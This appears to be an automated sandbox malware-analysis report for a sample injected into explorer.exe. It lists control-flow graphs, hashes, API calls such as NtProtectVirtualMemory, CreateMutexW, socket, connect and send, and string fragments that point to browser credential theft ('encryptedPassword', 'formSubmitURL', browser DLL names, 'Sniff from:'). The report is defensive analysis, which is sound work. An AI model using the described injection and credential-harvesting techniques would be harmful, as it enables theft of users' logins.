                                  • Opcode Fuzzy Hash: 5de8858bceb6b52e8c11e308410fa1d1098ae4878da76a5e8b5a3db0c78a0a43
                                  • Instruction Fuzzy Hash: 21529E30618B488FCB69EF68C4947EAB7E1FB55301F54462EC89FC7252DE30A54ACB85

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777784383.000000000C5E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0C5E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c5e0000_explorer.jbxd
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: `
                                  • API String ID: 823142352-2679148245
                                  • Opcode ID: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                  • Instruction ID: 6539a9b652887bb13c4194cf26d6198d6615586622114007a5209673d832c77b
                                  • Opcode Fuzzy Hash: de128a41b66c8ec8222e6cdebfc92e8119e2b93de7d93fbb6a18759800a4d987
                                  • Instruction Fuzzy Hash: 6E227B70B18A0D9FCB68DF28C4946AEF7E1FB99302F44422ED95ED3650DB30A451CB81

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 447 c612e12-c612e38 448 c612e45-c612e6e NtProtectVirtualMemory 447->448 449 c612e40 call c611942 447->449 450 c612e70-c612e7c 448->450 451 c612e7d-c612e8f 448->451 449->448
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL ref: 0C612E67
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777784383.000000000C5E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0C5E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c5e0000_explorer.jbxd
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                  • Instruction ID: d5f41df2fceda6befefb52c8a07ffbd1fdba2dcc48befef2322a4834301a7b9e
                                  • Opcode Fuzzy Hash: 8fde5b3aa229c20c01e10f6c0a0911328a1d50ad6ca7dd15efa95d0be41baddf
                                  • Instruction Fuzzy Hash: C801B530628B484F8784EF6CD48012AB7E4FBCE315F000B3EE99AC3250E770C5414742

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 452 c612e0a-c612e6e call c611942 NtProtectVirtualMemory 455 c612e70-c612e7c 452->455 456 c612e7d-c612e8f 452->456
                                  APIs
                                  • NtProtectVirtualMemory.NTDLL ref: 0C612E67
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777784383.000000000C5E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0C5E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c5e0000_explorer.jbxd
                                  Similarity
                                  • API ID: MemoryProtectVirtual
                                  • String ID:
                                  • API String ID: 2706961497-0
                                  • Opcode ID: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                  • Instruction ID: bc6841b5de4c366a885b2b240279913e23474dd88669217205647aa9647075de
                                  • Opcode Fuzzy Hash: d782dca5996f3574fd0c4455d89641a9bf745bba617b6185d934ac73d2235392
                                  • Instruction Fuzzy Hash: BD01A234628B884B8B48EB2C94512A6B3E5FBCE315F000B7EE99AC3241EB21D5024782

                                  Control-flow Graph

                                  APIs
                                  • ObtainUserAgentString.URLMON ref: 0C60C9A0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777784383.000000000C5E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0C5E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c5e0000_explorer.jbxd
                                  Similarity
                                  • API ID: AgentObtainStringUser
                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                  • API String ID: 2681117516-319646191
                                  • Opcode ID: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                  • Instruction ID: d90101d548ca87f61b5c8c9f51bac3b68d7d5c0d8d09182cfc96b71b1856ddb6
                                  • Opcode Fuzzy Hash: fab8d4f3d63e7cb3a61fc22749300fb1f1c56e9464b264e147718cbb7a7b3fb5
                                  • Instruction Fuzzy Hash: DE31D131614A4C8FCB14EFA8C8847EEBBE0FB59205F44022ED85EE7250DE748649C789

                                  Control-flow Graph

                                  APIs
                                  • ObtainUserAgentString.URLMON ref: 0C60C9A0
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777784383.000000000C5E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0C5E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c5e0000_explorer.jbxd
                                  Similarity
                                  • API ID: AgentObtainStringUser
                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                  • API String ID: 2681117516-319646191
                                  • Opcode ID: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                  • Instruction ID: 2dec0b8dcbcc77232fc312c2504ce975f92443ba702c88b0086f0ec01c183db9
                                  • Opcode Fuzzy Hash: 89ed80dc1d123a3fdb33b1283e784163d7980008e053a39b7e2b7c015d122c3c
                                  • Instruction Fuzzy Hash: 7421C370A10A4C8FCB24EFA8C8947EE7BE4FF59205F44422ED85AE7350DE7486098789

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 232 c608b66-c608b68 233 c608b93-c608bb8 232->233 234 c608b6a-c608b6b 232->234 235 c608bbb-c608bbc 233->235 236 c608b6d-c608b71 234->236 237 c608bbe-c608c22 call c60f612 call c611942 * 2 234->237 235->237 236->235 238 c608b73-c608b92 236->238 246 c608c28-c608c2b 237->246 247 c608cdc 237->247 238->233 246->247 249 c608c31-c608cd3 call c613da4 call c613022 call c6133e2 call c613022 call c6133e2 CreateMutexW 246->249 248 c608cde-c608cf6 247->248 249->247 263 c608cd5-c608cda 249->263 263->248
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777784383.000000000C5E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0C5E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c5e0000_explorer.jbxd
                                  Similarity
                                  • API ID: CreateMutex
                                  • String ID: .dll$el32$kern
                                  • API String ID: 1964310414-1222553051
                                  • Opcode ID: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                  • Instruction ID: 623b64fff3b218edf81203140fcb1b2ab1688145ece497e9d2471632da5fb184
                                  • Opcode Fuzzy Hash: 440592a6460f4a8a809c4e0f2019460d4d12f006c7151b444d4376acf3ab05fa
                                  • Instruction Fuzzy Hash: B6414D70918A088FDB68EFA8C4D47ED77F0FB58301F14467AD84AEB2A5DE309945CB85

                                  Control-flow Graph

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777784383.000000000C5E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0C5E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c5e0000_explorer.jbxd
                                  Similarity
                                  • API ID: CreateMutex
                                  • String ID: .dll$el32$kern
                                  • API String ID: 1964310414-1222553051
                                  • Opcode ID: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                  • Instruction ID: dbac96a092df337b7db428da28075b088ced22fda9a9847e575686680450ef11
                                  • Opcode Fuzzy Hash: d29081eafe973aeb990ac80f5dcafeb95ade16b14a0ff6f6c0f9231c9beedf12
                                  • Instruction Fuzzy Hash: A9412B70918A088FDB98EFA8C4987ED77F0FB58301F14417AC84EDB265DE309945CB85

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 293 c60e72e-c60e768 294 c60e788-c60e7ab connect 293->294 295 c60e76a-c60e782 call c611942 293->295 295->294
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777784383.000000000C5E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0C5E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c5e0000_explorer.jbxd
                                  Similarity
                                  • API ID: connect
                                  • String ID: conn$ect
                                  • API String ID: 1959786783-716201944
                                  • Opcode ID: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                  • Instruction ID: e31edc05b8c8d392285182333755751d99ea207ea61ca968a3eaba0cd1f28131
                                  • Opcode Fuzzy Hash: d2c20d592f91275318b70c66aa45ff63ae11574d98dcf1710f59c05c574d9bfb
                                  • Instruction Fuzzy Hash: BC015E30618B1C8FCB98EF1CE088B55B7E0FB59315F1545AED90DCB266C674C8818BC2

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 298 c60e732-c60e768 299 c60e788-c60e7ab connect 298->299 300 c60e76a-c60e782 call c611942 298->300 300->299
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777784383.000000000C5E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0C5E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c5e0000_explorer.jbxd
                                  Similarity
                                  • API ID: connect
                                  • String ID: conn$ect
                                  • API String ID: 1959786783-716201944
                                  • Opcode ID: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                  • Instruction ID: 83e02b4a6c23bbffb74221ed46ef2df50745228b0a3ef60aeffe6e0f0bcce90c
                                  • Opcode Fuzzy Hash: 640b8c0ab7b1bb3acdb51d34daf9cec4a3878eee67c7b90e610521ed962b484b
                                  • Instruction Fuzzy Hash: 71014470618A1C8FCB98EF5CE048B5577E0FB59315F1545AED90DCB266C774C9818BC2

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 411 c60e6b2-c60e6e5 412 c60e705-c60e72d send 411->412 413 c60e6e7-c60e6ff call c611942 411->413 413->412
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777784383.000000000C5E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0C5E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c5e0000_explorer.jbxd
                                  Similarity
                                  • API ID: send
                                  • String ID: send
                                  • API String ID: 2809346765-2809346765
                                  • Opcode ID: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                  • Instruction ID: c43c3e511a25852701e8f7342f58559c6420e08f18f9d0969d5937540a043a20
                                  • Opcode Fuzzy Hash: bba6785c5ab04fc1c912927f20b2eaf94db183ef6292e2548e0bd7e75e2cf9a2
                                  • Instruction Fuzzy Hash: 13011270618A1C8FDB98EF1CE048B2577E0FB58315F1546AED85DCB266C670D881CB85

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 416 c60e5b2-c60e5ea 417 c60e60a-c60e62b socket 416->417 418 c60e5ec-c60e604 call c611942 416->418 418->417
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777784383.000000000C5E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0C5E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c5e0000_explorer.jbxd
                                  Similarity
                                  • API ID: socket
                                  • String ID: sock
                                  • API String ID: 98920635-2415254727
                                  • Opcode ID: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                  • Instruction ID: ba5eb67e7f10a32941b939105623831c7cd9235d4a3dbe552cd857bedf825996
                                  • Opcode Fuzzy Hash: 205056058728d72a76f2a9c444eb1655fc63b7523a02cb36171bec795444162f
                                  • Instruction Fuzzy Hash: 48017C30618A1C8FCB84EF1CE048B55BBE0FB59314F1545AEE85ECB266C7B0C9818B86

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 421 c6062dd-c606320 call c611942 424 c606326 421->424 425 c6063fa-c60640e 421->425 426 c606328-c606339 SleepEx 424->426 426->426 427 c60633b-c606341 426->427 428 c606343-c606349 427->428 429 c60634b-c606352 427->429 428->429 430 c60635c-c60636a call c610f12 428->430 431 c606370-c606376 429->431 432 c606354-c60635a 429->432 430->431 434 c6063b7-c6063bd 431->434 435 c606378-c60637e 431->435 432->430 432->431 438 c6063d4-c6063db 434->438 439 c6063bf-c6063cf call c606e72 434->439 435->434 437 c606380-c60638a 435->437 437->434 440 c60638c-c6063b1 call c607432 437->440 438->426 442 c6063e1-c6063f5 call c6060f2 438->442 439->438 440->434 442->426
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777784383.000000000C5E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0C5E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c5e0000_explorer.jbxd
                                  Similarity
                                  • API ID: Sleep
                                  • String ID:
                                  • API String ID: 3472027048-0
                                  • Opcode ID: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                  • Instruction ID: 56ea6bf862e502ba120e2d37f350a0b2397cea2fd51e954b0aaf1c6df8fceee6
                                  • Opcode Fuzzy Hash: 2c485226c71f8ce073f7c86c27236fb263c26e76649b5794a31fce9b42c1bba6
                                  • Instruction Fuzzy Hash: 4C315AB4604B09DEDB7CAF29C0482E6B7A0FB45300F64527EDE2D9A246C7709564CFD1

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 457 c606412-c606446 call c611942 460 c606473-c60647d 457->460 461 c606448-c606472 call c613c9e CreateThread 457->461
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777784383.000000000C5E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 0C5E0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c5e0000_explorer.jbxd
                                  Similarity
                                  • API ID: CreateThread
                                  • String ID:
                                  • API String ID: 2422867632-0
                                  • Opcode ID: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                  • Instruction ID: 7bfd84896c3c5db6987dcff16bca8be9bb153e58dee1cf82fa6532c8e5d3726c
                                  • Opcode Fuzzy Hash: 86dfbf082f461ee8d50c48ad175151c38d579804c722c71aa6313b9ca1572f48
                                  • Instruction Fuzzy Hash: 12F0F630268A484FD798EF2CD44567AF3E0FBE9215F45463EA94DC3364DA39C5814716
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$32.d$M$S$dll$el32$kern$ll$net.$user$wini
                                  • API String ID: 0-393284711
                                  • Opcode ID: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                  • Instruction ID: d63dc563115e2a805394e1ec8ad49a7aa718bca1380cf37e402057e6f4ba114d
                                  • Opcode Fuzzy Hash: 666e7131670ab6034242d7bb31114c5afc39a2cef586e73e73495a4832ac64d3
                                  • Instruction Fuzzy Hash: 86E15B70628F488FC765EF68C4947EAB7E0FB58301F504A2E969FD7641DF30A5058B86
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: Fiel$Subm$d$dPas$dUse$e$encr$encr$form$guid$itUR$name$rnam$swor$user$ypte$ypte
                                  • API String ID: 0-2916316912
                                  • Opcode ID: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                  • Instruction ID: 178cd3b9c6181040f41352bd9b6558044831cbad86ad856ab7fd9f72978aab15
                                  • Opcode Fuzzy Hash: 1a4675aa69093f914decc08927043d33ef050167d1a45f8fb32d144d534e0ced
                                  • Instruction Fuzzy Hash: 2EB19930628B488FDB59EF68C485AEEB7F1FF98300F50451ED59AD7261EF7094098B86
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 2$c$d$d$d$e$i$l$l$l$n$n$p$s$t$u$w
                                  • API String ID: 0-1539916866
                                  • Opcode ID: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                  • Instruction ID: aa4e04093c9e0b3d56b5935ffe5b29f875faae4321af26a5c9a1f5417db77e56
                                  • Opcode Fuzzy Hash: e72b72cb0cc01a4fb435a8ab5948bc97e669459bbd1002971cdc116c820d8f81
                                  • Instruction Fuzzy Hash: 6241B170B28B088FDB14DF88A4566FD7BE2FB48700F00025ED509E7645DBB59D498BD6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: D$[$[$[$[$[$]$]$b$c$e$l$l$n
                                  • API String ID: 0-355182820
                                  • Opcode ID: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                  • Instruction ID: df930cdeb992650f12b7acb3fd3f07d0359b99a4eaadf1506c7f1f3400acab50
                                  • Opcode Fuzzy Hash: 5b00ea5ff0ac38f91c5f3451741050e74e6bfffb06a4f81f7af14d2d93e98743
                                  • Instruction Fuzzy Hash: 88C16B70628B098FC758EF28C495AEAF3E5FB98304F40462E959AD7650DF30A519CF87
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .$0$c$n$r$r$r$r$r$r$r$r
                                  • API String ID: 0-97273177
                                  • Opcode ID: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                  • Instruction ID: d7e97e5f2910a838f96028c3d7c56537c65b82c7cb2ea7c49a0e77fa831514de
                                  • Opcode Fuzzy Hash: c99d8b63ad26ee68af9772b0c2f17264c0bbc41cf5067afa0da8e01a5053a168
                                  • Instruction Fuzzy Hash: 8F51B5315287488FD719DF18C4853EAB7E5FB85704F50192EE9CB97241DBB4950ACF82
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                  • API String ID: 0-639201278
                                  • Opcode ID: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                  • Instruction ID: 24e9c9edaa4b4717d0efee34524e9098a86d9cd418e949a0c515a103a876c402
                                  • Opcode Fuzzy Hash: f43930ec246ad51b32166c0bc4bf79f326171222225a5f9c9c86c27c8781e096
                                  • Instruction Fuzzy Hash: 3AC1BF70628A198FC758EF68C495AEAF3E4FB98300F504329954ED7611DF30AA068FC6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4.dl$cli.$dll$dragon_s.dll$l$nspr$opera_browser.dll$sspi
                                  • API String ID: 0-639201278
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: UR$2$L: $Pass$User$name$word
                                  • API String ID: 0-2058692283
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: UR$2$L: $Pass$User$name$word
                                  • API String ID: 0-2058692283
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $.$e$n$v
                                  • API String ID: 0-1849617553
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 2.dl$dll$l32.$ole3$shel
                                  • API String ID: 0-1970020201
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 4$\$dll$ion.$vers
                                  • API String ID: 0-1610437797
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: 32.d$cli.$dll$sspi$user
                                  • API String ID: 0-327345718
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$el32$h$kern
                                  • API String ID: 0-4264704552
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $Snif$f fr$om:
                                  • API String ID: 0-3434893486
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: $Snif$f fr$om:
                                  • API String ID: 0-3434893486
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$chro$hild$me_c
                                  • API String ID: 0-3136806129
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .dll$chro$hild$me_c
                                  • API String ID: 0-3136806129
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                  • API String ID: 0-319646191
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: User-Agent: $nt: $on.d$urlmon.dll
                                  • API String ID: 0-319646191
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .$l$l$t
                                  • API String ID: 0-168566397
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: .$l$l$t
                                  • API String ID: 0-168566397
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000007.00000002.3777686452.000000000C390000.00000040.00000001.00040000.00000000.sdmp, Offset: 0C390000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_7_2_c390000_explorer.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID: auth$logi$pass$user
                                  • API String ID: 0-2393853802

                                  Execution Graph

                                  Execution Coverage:1.9%
                                  Dynamic/Decrypted Code Coverage:6.7%
                                  Signature Coverage:0%
                                  Total number of Nodes:623
                                  Total number of Limit Nodes:75
99699 253d327 99698->99699 99707 253f710 99699->99707 99703 253d39b 99704 253d3a2 99703->99704 99718 254a2a0 LdrLoadDll 99703->99718 99704->99644 99706 253d3b5 99706->99644 99708 253f735 99707->99708 99719 25381a0 99708->99719 99710 253d36f 99715 254a6e0 99710->99715 99711 2544a50 8 API calls 99713 253f759 99711->99713 99713->99710 99713->99711 99714 254bdc0 2 API calls 99713->99714 99726 253f550 LdrLoadDll CreateProcessInternalW LdrInitializeThunk 99713->99726 99714->99713 99716 254af60 LdrLoadDll 99715->99716 99717 254a6ff CreateProcessInternalW 99716->99717 99717->99703 99718->99706 99720 253829f 99719->99720 99721 25381b5 99719->99721 99720->99713 99721->99720 99722 2544a50 8 API calls 99721->99722 99723 2538222 99722->99723 99724 254bdc0 2 API calls 99723->99724 99725 2538249 99723->99725 99724->99725 99725->99713 99726->99713 99728 2544e50 LdrLoadDll 99727->99728 99729 253f6ef 99728->99729 99730 253f6f6 SetErrorMode 99729->99730 99731 253f6fd 99729->99731 99730->99731 99731->99657 99733 25443c6 99732->99733 99745 253f4a0 99732->99745 99733->99659 99736 254bd40 2 API calls 99735->99736 99739 2538ad5 99736->99739 99737 2538cea 99737->99662 99739->99737 99764 2549880 99739->99764 99741 253f683 99740->99741 99812 2549e90 99741->99812 99744->99669 99746 253f4bd 99745->99746 99752 2549fc0 99746->99752 99749 253f505 99749->99733 99753 254af60 LdrLoadDll 99752->99753 99754 2549fdc 99753->99754 99762 47c2f30 LdrInitializeThunk 99754->99762 99755 253f4fe 99755->99749 99757 254a010 99755->99757 99758 254af60 LdrLoadDll 99757->99758 99759 254a02c 99758->99759 99763 47c2d10 LdrInitializeThunk 99759->99763 99760 253f52e 99760->99733 99762->99755 99763->99760 99765 254bf90 2 API calls 99764->99765 99766 2549897 99765->99766 99785 2539310 99766->99785 99768 25498b2 99769 25498f0 99768->99769 99770 25498d9 99768->99770 99772 254bd40 2 API calls 99769->99772 99771 254bdc0 2 API calls 99770->99771 99773 25498e6 99771->99773 99774 254992a 99772->99774 99773->99737 99775 254bd40 
